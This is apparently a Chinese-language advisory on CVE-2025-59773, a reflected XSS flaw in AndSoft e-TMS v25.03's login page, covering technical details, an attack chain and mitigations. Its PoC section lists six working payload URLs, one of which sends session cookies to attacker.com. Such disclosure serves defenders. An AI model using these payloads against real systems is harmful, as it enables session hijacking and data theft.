CVE-2025-59773：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59773

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59773是存在于AndSoft公司开发的e-TMS（Transportation Management System，运输管理系统）v25.03版本中的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1评分为6.1分，属于中危级别。

AndSoft e-TMS是一款广泛应用于物流和运输行业的运输管理解决方案，用于管理车队、运输订单、货物跟踪等业务流程。由于该系统通常部署在企业内网或面向合作伙伴的服务器上，其安全性直接关系到企业核心业务数据的保护。

该漏洞存在于系统的登录页面路径'/clt/LOGINFRM_TP.ASP'中，涉及多个参数，包括'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'。这些参数在接收用户输入后未经过充分的过滤和转义处理，直接将输入内容反射到响应页面中，导致攻击者可以构造包含恶意JavaScript代码的URL，诱骗受害者点击后在浏览器中执行任意脚本。

由于该漏洞利用条件简单（仅需受害者点击恶意链接），且影响范围明确，属于典型的反射型XSS漏洞，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全风险。

技术细节

该漏洞是典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于AndSoft e-TMS v25.03的登录页面'/clt/LOGINFRM_TP.ASP'对用户输入参数缺乏充分的验证和HTML实体编码处理。

技术原理：
1. 漏洞入口为'/clt/LOGINFRM_TP.ASP'文件，该文件负责渲染登录表单页面。
2. 页面中存在多个未经过滤的用户输入参数：'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'。
3. 当用户访问包含这些参数的URL时，服务器直接将参数值嵌入到返回的HTML页面中，未进行HTML实体编码（如将'<'转义为'<'，'>'转义为'>'）。
4. 攻击者可以构造恶意URL，在参数值中注入JavaScript代码，例如：<script>alert(document.cookie)</script>。
5. 当受害者点击该恶意链接时，恶意脚本将在受害者的浏览器上下文中执行。

利用方式：
- 攻击者通过社会工程学手段（如钓鱼邮件、即时消息）发送包含恶意参数的URL给受害者。
- 受害者点击链接后，恶意JavaScript代码在浏览器中执行。
- 攻击者可窃取用户的会话Cookie（若未设置HttpOnly标志），进而冒充用户身份访问系统。
- 攻击者还可利用此漏洞进行钓鱼攻击、键盘记录、重定向到恶意网站等操作。

CVSS向量分析：AV:N（网络攻击）、AC:L（低复杂度）、PR:N（无需权限）、UI:R（需要用户交互）、S:C（范围变更）、C:L（低机密性影响）、I:L（低完整性影响）、A:N（无可用性影响），表明该漏洞虽然需要用户交互，但利用门槛低，且可能影响超出系统本身的范围。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过侦察发现目标系统使用AndSoft e-TMS v25.03版本，并识别出登录页面路径'/clt/LOGINFRM_TP.ASP'。

STEP 2

步骤2：漏洞验证

攻击者测试发现'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'参数存在反射型XSS漏洞，服务器未对输入进行过滤和编码。

STEP 3

步骤3：恶意URL构造

攻击者构造包含恶意JavaScript代码的URL，例如注入Cookie窃取脚本或钓鱼页面重定向代码。

STEP 4

步骤4：社工投递

攻击者通过钓鱼邮件、即时消息或其他社会工程学手段，将恶意URL发送给目标用户。

STEP 5

步骤5：触发执行

受害者点击恶意链接后，浏览器向目标服务器发送请求，服务器将恶意脚本反射回响应页面并在受害者浏览器中执行。

STEP 6

步骤6：数据窃取

恶意脚本执行后，攻击者可窃取用户的会话Cookie、敏感信息，或进行钓鱼攻击、重定向到恶意网站等操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

## CVE-2025-59773 - AndSoft e-TMS Reflected XSS PoC
## Vulnerability: Reflected XSS in /clt/LOGINFRM_TP.ASP
## Affected Parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn

## PoC 1: Basic XSS via 'l' parameter
https://target.com/clt/LOGINFRM_TP.ASP?l=<script>alert('XSS-CVE-2025-59773')</script>

## PoC 2: XSS via 'demo' parameter
https://target.com/clt/LOGINFRM_TP.ASP?demo=<script>alert(document.cookie)</script>

## PoC 3: XSS via 'TNTLOGIN' parameter
https://target.com/clt/LOGINFRM_TP.ASP?TNTLOGIN="><script>alert('XSS')</script>

## PoC 4: Cookie stealing via 'UO' parameter
https://target.com/clt/LOGINFRM_TP.ASP?UO=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

## PoC 5: XSS via 'SuppConn' parameter
https://target.com/clt/LOGINFRM_TP.ASP?SuppConn=<img src=x onerror=alert('XSS-CVE-2025-59773')>

## PoC 6: Combined parameters exploitation
https://target.com/clt/LOGINFRM_TP.ASP?l=<script>alert('XSS')</script>&demo2=<script>alert(document.domain)</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署针对'/clt/LOGINFRM_TP.ASP'路径的XSS防护规则，过滤恶意脚本载荷；2）在Web服务器层面配置URL重写规则，对可疑参数进行过滤；3）实施Content Security Policy（CSP），限制页面脚本执行；4）为所有Cookie设置HttpOnly标志，降低Cookie窃取风险；5）加强用户安全意识培训，警惕来自不明来源的链接；6）监控Web访问日志，及时发现可疑的XSS攻击尝试。